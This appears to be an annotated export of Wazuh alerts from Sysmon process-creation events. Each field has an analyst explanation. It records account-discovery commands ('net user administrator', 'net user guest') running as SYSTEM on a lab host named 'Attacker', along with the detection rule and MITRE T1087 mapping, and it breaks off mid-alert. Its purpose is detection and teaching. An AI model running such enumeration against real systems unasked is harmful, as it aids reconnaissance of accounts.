agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2281048 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.2961799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291056 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.290
ProcessGuid: {94294ddc-be63-680a-260c-000000000e00}
ProcessId: 16356
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.290 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-260c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2286331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.3953532Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291059 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.390
ProcessGuid: {94294ddc-be63-680a-280c-000000000e00}
ProcessId: 16124
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-260c-000000000e00}
ParentProcessId: 16356
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.390 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-280c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16124 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-260c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2291476 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.4548542Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291062 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.446
ProcessGuid: {94294ddc-be63-680a-290c-000000000e00}
ProcessId: 10860
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.446 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-290c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2296727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.5556163Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291066 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.550
ProcessGuid: {94294ddc-be63-680a-2b0c-000000000e00}
ProcessId: 10252
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-290c-000000000e00}
ParentProcessId: 10860
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.550 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2b0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-290c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2301808 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.6117639Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.603
ProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00}
ProcessId: 8956
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.603 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
